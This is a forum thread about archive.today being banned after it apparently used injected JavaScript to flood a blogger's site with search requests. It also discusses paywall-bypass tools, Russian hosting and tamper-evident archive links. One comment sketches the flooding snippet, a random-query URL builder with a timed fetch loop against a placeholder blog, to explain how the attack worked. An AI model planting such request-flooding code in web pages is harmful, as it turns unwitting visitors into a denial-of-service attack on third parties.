- cross-posted to:
- [email protected]
- [email protected]
How does the paywall circumvention of archive.today work?
As someone who uses Bypass Paywalls Clean, this is so frustrating.
Bypass Paywalls Clean was chased off of the Firefox Add-ons site, chased off of GitLab, and chased off of GitHub via DMCA takedown notices for copyright infringement. It is now hosted on the Russian Gitflic.ru.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).
We have spent the better part of two decades dealing with the DMCA being used as an outright weapon to silence information that corporations and government find inconvenient mostly because that information is wildly incriminating for them. It works especially strongly because a large amount of the world’s internet has been consolidated to the US and its vast hosting structures like AWS and Cloudflare, putting enormous amounts of the internet under the direct influence of US laws like the DMCA.
Websites like Anna’s Archive, Libgen, and Sci-Hub live because they use hosting in countries that allow them to bypass these kind of restrictions. Russia is one of the most common countries for them to host the data out of due to the lack of enforcement of copyright laws, although it is obviously not the only country that these sites use.
Until we are able to alter international copyright protections to be reasonable instead of their current over-zealous and aggressively abusive nature, we will all suffer having to risk hosting such sites in countries that are otherwise very unsavory to associate with.
We live in the kind of world early piracy pioneers such as the original creators of The Pirate Bay were trying to prevent from becoming a reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretations of copyright law so they could send these men to prison.
Ironically, when Russia was joining the World Trade Organization in the early 2010s, one requirement was for them to block pirate sites, namely torrent-sharing ones. Which they did, and the sites are blocked to this day.
Iirc that was also when the domain torrents.ru was taken away from what is now called RuTracker.
I’m with you on this, but let’s be careful here.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).
I once made a YouTube video which somehow included a clip from some RT Russian TV bullshit show. (The show was in fact a direct ripoff of Gordon Ramsay’s Hell’s Kitchen, for which I’m sure they did not get a license.)
Some fucking Russian troll bots then DMCA’d my YouTube video for using their clip, even though it was clearly “fair use” in US jurisdiction, and YouTube happily sucked their Russian dicks and flagged and removed my video.
And my video had probably 15 views, like it wasn’t a big thing.
So they aren’t exactly the Robin Hood of free speech.
Not sure how this says anything about Russian copyright laws or Russian government.
Of course they aren’t, they will happily block information that they dislike because it’s embarrassing and incriminating to them. Skepticism should cut both ways: skepticism of those who use a Russian connection to delegitimize valuable tools and the people associated with them, and skepticism of why Russia allows those things to persist provided they impact Western countries but not Russia.
Until the Western copyright situation is amended to something reasonable, we have to be skeptical in all aspects of this situation. I’d rather copyright was a reasonable length with reasonable policies so organizations didn’t have to resort to connections with Russia. In the meantime we have to work with the situation we have.
Is your comment in the thread about Wikipedia banning archive.today?
edit: I realised by reading other comments that many used archive.today to bypass paywalls, aside from the archival purpose Wikipedia relied on.
Original post title was:
Until further notice: archive.today/archive.is/archive.ph/… is banned from this community for apparently being a Russian DDOS tool
And linked to the /c/ukraine community which posted it.
Also, from the Ars story:
Patokallio wasn’t able to determine who runs Archive.today but mentioned apparent aliases such as “Denis Petrov” and “Masha Rabinovich,” and described evidence that the site is operated by someone from Russia.
The reason it matters:
It makes people suspicious of anything hosted in Russia, which is frustrating because there’s a lot of valuable shit hosted there by people who are not necessarily from there, such as Alexandra Elbakyan, founder of Sci-Hub, who has had many accusations tossed her way due to her website’s association with Russia:
In December 2019, The Washington Post reported that Elbakyan was under investigation by the US Justice Department on suspicion of working with Russia’s military intelligence arm, the GRU, to steal U.S. military secrets from defense contractors. Elbakyan has denied this, saying that Sci-Hub “is not in any way directly affiliated with Russian or some other country’s intelligence,” but noting that “of course, there could be some indirect help. The same as with donations, anyone can send them; they are completely anonymous, so I do not know who exactly is donating to Sci-Hub. There could be some help that I’m simply unaware of. I can only add that I write all of Sci-Hub code and design myself and I’m doing the server’s configuration.”
We should not forget that one of the reasons we have access to a large amount of archived information on the internet is that unsavory countries refuse to play by the US government’s copyright rules.
Nor should we forget how connections with those countries are used to delegitimize people providing valuable services. Bypass Paywalls Clean in particular has had a litany of people assume it’s untrustworthy because of its current hosting situation, because they don’t know its history and how it’s been kicked off of every other public repository that was stateside.
The archive.today person fucked things up and gave people more ammunition to claim that anything and everything associated with Russian internet is untrustworthy.
I don’t see a possible connection of archive.today to someone based in Russia as relevant.
The only facts that should be relevant are that its manager is an egomaniac and cannot be trusted.
hey thanks, i had never heard of that bypass paywalls firefox addon
There’s also a version for Chrome if you swing that way.
I do not because I don’t like ads on Youtube, but thx.
For anyone curious, I looked into the DDOSing: a simple string of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone looked at an archive, they unknowingly sent a request to the blog under attack.
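A minimal sketch of what such an injected snippet might have looked like. This is a hypothetical re-creation, not the actual code: the blog URL, the `s` parameter name, and the interval are all assumptions.

```javascript
// Build a search URL with a random query string, so every request misses any
// cache and forces the target server to run a fresh (expensive) search.
function randomSearchUrl(base) {
  const q = Math.random().toString(36).slice(2); // random alphanumeric token
  return `${base}/?s=${q}`;
}

// In the browser, the injected snippet would fire this on a timer, e.g.:
// setInterval(() => {
//   fetch(randomSearchUrl('https://blog.example.com'), { mode: 'no-cors' });
// }, 300);
```

The random parameter is the key detail: it makes each request unique, so neither browser caches nor a CDN can absorb the load on the victim’s behalf.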
Good reminder to donate to web.archive.org
While archive.org is good and more trustworthy than archive.is, it isn’t as useful for bypassing paywalls.
I do hope this move results in more support for the IA/Wayback Machine and helps them to update some of their crawler tech — thanks to the rise of AI, some sites are effectively (thru captchas etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.
If this is not an announcement, Lemmy lets you edit your post titles so you can correct that mistake instead of luring in people who think lemmy.world is also banning links using archive.today.
I’m not speculating on your intent, only pointing out that you can correct this situation instead of apologizing after the fact.
This is understandable, but at the same time, none of the anti-paywall lists are as good as archive.today. They actually have paid accounts at a bunch of paywalled sites, and use them when scraping.
Unfortunately, they’ve allegedly modified the contents of some archived articles, so even though they may do a better job of archiving, nothing archived is of any value because it cannot be trusted.
What if somebody used archive.today to bypass a paywall and then archived that using Web Archive? (So we’re sure the content stays the same)
They’re injecting data into the sites during archiving, so that wouldn’t work.

I’ve switched to .md when the community mentioned something was up with the .today domain. Hopefully that one isn’t compromised.
It’s the same person running all of them, so yeah it is.
Damn.
URL
archive[.]today
archive[.]fo
archive[.]is
archive[.]li
archive[.]md
archive[.]ph
archive[.]vn
archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd[.]onion

https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI
Democracy died in daylight; the darkness hides the rotten body.
Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.
Who cares why they did it?
It proves they can and do alter the “archived” website, so its usefulness as a source is completely gone.
Yeah, ESH. His response of editing an archive showed the site to be unreliable as an archive. DDOSing from the site as a counter to the dox attempt caused the site serious reputational harm as well.
It sucks because his site was actually more reliable than The Internet Archive.
He only modified archived pages in response to a dox attempt?
And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.
Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
Actually a pretty good idea.
Only works for archived pages though, because for any regular page, a large portion of the page will be dynamically generated; hashing the HTML will only say the framework hasn’t changed.
You would need a way of verifying that the SHA256 is a true copy of the site at the time, though, and not a faked page. You could do something like have a distributed network of archives that coordinate archival at the same time, then use the SHA256 to see, through some search functionality, which archives fetched exactly the same page at the same time. If add-ons are already being used for the crawling, we may be mostly there already, since those add-ons would just need to certify their archive, and after that they can discard the actual copy of the page. You would need a way to validate those workers, though, since a bad actor could run a whole bunch at the same time to legitimize a fake archival.
The idea is to verify the archival copy’s URL, not to verify the original content. So yes, a server could push different content to the archiver than to people, or vary by region, or an AitM could modify the content as it goes out to the archiver. But adding the sha256 in the URL query parameter means that if someone publishes a link to an archive copy online, anyone else using the link can know they’re looking at the same content the other person was referencing.
If the archive content changes, that URL will be invalid; if someone uses a fake hash, the URL will be invalid (which is why MD5 wouldn’t be appropriate).
The beauty of this technique is that query parameters are generally ignored if unsupported by the web server, so any archival service could start using this technique today, and all it would require is a browser extension to validate the parameter.
Link it to something like Web of Trust, and you’ve solved the separate issue you described.
In fact, this is a feature WoT could add to their extension today, and it would “Just Work”. For that matter, Archive.org could add it to their extension today, too.
Remind me to ping Jason about that.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
IPFS says hi
Yes; the problem IPFS has is the same problem IPv6 has.
The hash-in-a-URL solution can function cleanly in the background on top of what people already use.
Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.
It wasn’t a dox attempt though. The blog just collected information that was already publicly available on other sites.
As they should since it doesn’t matter.
Yeah, someone being shitty to you doesn’t mean you go full-fledged shitty in return; it kind of proves your lack of trustworthiness to begin with. It’s like Nazis being like “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.
Bro any archiving/scraping tool can be used for DDoS, u just tell it to archive the same site over and over and now u have a different IP spamming the endpoint
In this case, their CAPTCHA page intentionally included code to DoS a particular blog, sending a request to search for a random string every 300ms (search is very CPU-intensive). This was regardless of the archived site you were trying to view.
Any good archiver will check for an existing archived copy before making a request, and will batch requests. This was very different from the attack you’re imagining: if you opened any archive.today page, it would poll a developer’s personal blog, regardless of whether you were interacting with content from that blog.
don’t know all the details. fyi basically. i forget where i saw the same site mentioned for the same thing. don’t call me bro Bro